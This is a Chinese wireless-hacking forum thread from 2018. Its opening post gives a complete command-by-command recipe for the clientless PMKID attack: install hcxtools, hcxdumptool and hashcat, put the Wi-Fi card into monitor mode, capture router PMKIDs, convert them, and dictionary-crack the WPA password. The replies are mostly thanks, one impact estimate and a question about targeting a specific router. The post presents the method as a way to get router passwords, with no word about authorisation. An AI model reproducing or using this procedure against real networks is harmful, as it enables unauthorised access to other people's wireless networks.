ubnt解决方案
查看: 10240|回复: 21

不需要有客户端 也能抓包新方法

[复制链接]

30

回帖

272

积分

18 小时

在线时间

少尉

注册时间
2016-6-10
金币
229 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2018-8-27 14:29 |显示全部楼层
本帖最后由 abc_2017 于 2018-8-27 15:02 编辑

据hashcat研究人员发现........
所有支持漫游路由器, 都无需要有客户端在线 也能实现抓到 "包" pmkID

测试环境最新的Kali
需要安装下面3个
hcxtools v4.2
hcxdumptool  抓取捕获pmkid值
hashcat v4.2  用来跑这种抓取到pmkid数据

安装操作步骤1. 下一步..
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install


2. 下一步..
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install


3. 下一步..
wget https://hashcat.net/files/hashcat-4.2.1.7z
7z x hashcat-4.2.1.7z


4. 下一步..开始抓取路由器pmkID
ifconfig wlan0 down
iwconfig wlan0 mode monitor
iwconfig wlan0 up
hcxdumptool -o test.pcapng -i wlan0 --enable_status=1
由于信道环境噪杂干扰  需等待时间可能需要廷长...

但当返回如下信息数据时,说明成功抓取到PMKID
[FOUND PMKID]

以上在无客户端情况下获取到PMKID成功 (这时相当于抓到路由器含有验证过密码4次握手包)

而且PMKID永远是准确有效性握手,  相比于4路握手包  优点不需要再去分析数据握手是否有效性, 而它是直接有效性
当取得PMKID数据时它直接就是有效的, 无需再分析它
只需要将其pcapng格式转换就可以进行直接字典暴力破解

但目前只有hashcat支持这种格式暴力破解, 不会使用hashcat的 也无须担心  其它跑包软件将也会支持这种格式暴力破解  ( 例如wifipr ewsa )

但现在想要暴力破解它得到唯一的密码,你还需要将pcapng格式转换为hashcat支持的格式
先测试转换为hashcat支持的格式命令如下
hcxpcaptool -z test.16800 test.pcapng

然后开始使用hashcat跑包



补充。。。
另外还发现  .cap格式文件也含有pmkID值(如果路由器支持漫游功能的,抓取到.cap格式也会含有pmkid)

评分

2

查看全部评分

3

回帖

33

积分

5 小时

在线时间

新兵上阵

注册时间
2018-9-29
金币
24 个
威望
1 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2018-10-3 14:04 |显示全部楼层
本帖最后由 eseven 于 2018-10-3 14:07 编辑

cnblogs-利用PMKID破解PSK的实际测试与影响评估
结论:  该漏洞在家庭环境中,受影响比例不到2%;办公环境中,受影响比例不到3%。
影响面太小,还无法成为常用的攻击手段。




回复

使用道具 举报

211

回帖

13万

积分

455 小时

在线时间

管理员

官方管理组

注册时间
2004-2-16
金币
135837 个
威望
26 个
荣誉
5 个
累计签到:69 天
连续签到:0 天
[LV.100]试剑无线
发表于 2018-8-27 14:36 |显示全部楼层
前二周看到这个漏洞了,不过使用面小得多
发布任何帖子,请均需参照版块版规要求发布以及回复;禁止讨论带有政治色彩的一切言论,一经发现严惩不贷;
禁止频繁没有实际意义的灌水和恶意灌水行为,包括:复制粘贴、纯表情等贴;
禁止粗言秽语和人身攻击言辞;
请严于律己!配合我们的工作!谢谢!!
回复

使用道具 举报

30

回帖

272

积分

18 小时

在线时间

少尉

注册时间
2016-6-10
金币
229 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2018-8-27 14:42 |显示全部楼层
中国无线门户 发表于 2018-8-27 14:36
前二周看到这个漏洞了,不过使用面小得多

嗯嗯 有多有少   新型路由大多支持漫游了吧
回复

使用道具 举报

177

回帖

1万

积分

1057 小时

在线时间

上校

注册时间
2017-10-26
金币
17578 个
威望
1 个
荣誉
0 个
累计签到:1513 天
连续签到:1 天
[LV.1825]无线元老
发表于 2018-8-27 15:16 |显示全部楼层
学习学习
回复

使用道具 举报

16

回帖

23

积分

12 小时

在线时间

新兵上阵

注册时间
2016-11-15
金币
1 个
威望
1 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2018-8-28 07:38 |显示全部楼层
还是老老实实
回复

使用道具 举报

16

回帖

23

积分

12 小时

在线时间

新兵上阵

注册时间
2016-11-15
金币
1 个
威望
1 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2018-8-28 07:38 |显示全部楼层
还是老老实实抓包吧
回复

使用道具 举报

94

回帖

2757

积分

165 小时

在线时间

少校

注册时间
2010-11-1
金币
2640 个
威望
1 个
荣誉
0 个
累计签到:260 天
连续签到:0 天
[LV.365]无线熟人
发表于 2018-8-28 08:18 |显示全部楼层
留着脚印,新方法得学习学习
回复

使用道具 举报

137

回帖

1686

积分

76 小时

在线时间

上尉

注册时间
2017-10-10
金币
1515 个
威望
2 个
荣誉
1 个
累计签到:134 天
连续签到:0 天
[LV.200]无线新星
发表于 2018-8-29 14:37 |显示全部楼层
貌似很厉害,学习了
回复

使用道具 举报

2387

回帖

1万

积分

785 小时

在线时间

上校

注册时间
2012-7-19
金币
12133 个
威望
10 个
荣誉
0 个
累计签到:798 天
连续签到:1 天
[LV.1095]铁杆粉丝
发表于 2018-8-29 15:09 |显示全部楼层
命令行中没有看到输入的具体路由的地址,也就是说这么去抓想要的路由的数据包呢?
开开心心每一天
回复

使用道具 举报

16

回帖

23

积分

12 小时

在线时间

新兵上阵

注册时间
2016-11-15
金币
1 个
威望
1 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2018-8-30 19:01 |显示全部楼层
太难!!!!!!!!!!!!!!!!!!!!
回复

使用道具 举报

41

回帖

1184

积分

80 小时

在线时间

上尉

注册时间
2016-2-9
金币
1113 个
威望
1 个
荣誉
0 个
累计签到:168 天
连续签到:0 天
[LV.200]无线新星
发表于 2018-9-4 15:26 |显示全部楼层
因为我是小白看上去感觉不错,说的软件都不熟悉认识所以要从头学习,不过我还是要支持一下顶一个
回复

使用道具 举报

2

回帖

226

积分

12 小时

在线时间

少尉

注册时间
2017-10-6
金币
213 个
威望
2 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2018-9-27 17:40 |显示全部楼层
2529082378 发表于 2018-8-29 15:09
命令行中没有看到输入的具体路由的地址,也就是说这么去抓想要的路由的数据包呢?

同问
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-4-20 12:01

返回顶部 返回列表